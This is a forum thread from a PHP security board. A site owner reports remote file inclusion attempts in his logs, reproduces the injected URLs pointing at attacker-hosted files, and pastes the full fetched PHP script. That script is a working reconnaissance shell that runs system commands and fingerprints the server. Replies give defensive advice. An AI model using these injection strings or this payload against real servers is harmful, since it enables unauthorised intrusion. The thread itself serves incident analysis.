php injection script 'fx29id2.txt'

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
sak
Forum Newbie
Posts: 4
Joined: Sun Apr 26, 2009 9:02 am

php injection script 'fx29id2.txt'

Post by sak »

Hello guys,
As seen in my logs someone is sending me an external php script the following way:
1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??

I have opened the php script and basically it test how well my server security is, I guess...
Anyone can supply further info. about this script?
How do I track the sender?

by the way, this is the script:

Code: Select all

 
<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }  
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>
 
Last edited by Benjamin on Tue May 05, 2009 1:21 pm, edited 1 time in total.
Reason: Added code tags.
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: php injection script 'fx29id2.txt'

Post by kaisellgren »

sak wrote:1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??
I'm not sure how he can do that. Even if you have register globals turned on the $_SERVER shouldn't be rewritten.

The script you showed is a backdoor created by the intruder. It seems that he switched your document root server variable to his remote server's address and got an access to your server.

What PHP version are you running? You should definitely turn off Register Globals and upgrade your PHP as it seems that PHP is the one, which is vulnerable here. No matter what settings I try, I cannot reproduce that kind of $_SERVER overwriting on my PHP 5.2.8.
sak
Forum Newbie
Posts: 4
Joined: Sun Apr 26, 2009 9:02 am

Re: php injection script 'fx29id2.txt'

Post by sak »

Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server since it is well-secured, however, I just wanted to know whether it is possible to track down the sender.
Thanks
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: php injection script 'fx29id2.txt'

Post by kaisellgren »

sak wrote:Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server since it is well-secured, however, I just wanted to know whether it is possible to track down the sender.
Thanks
Well you have his domain name, try to track him down from there..
Post Reply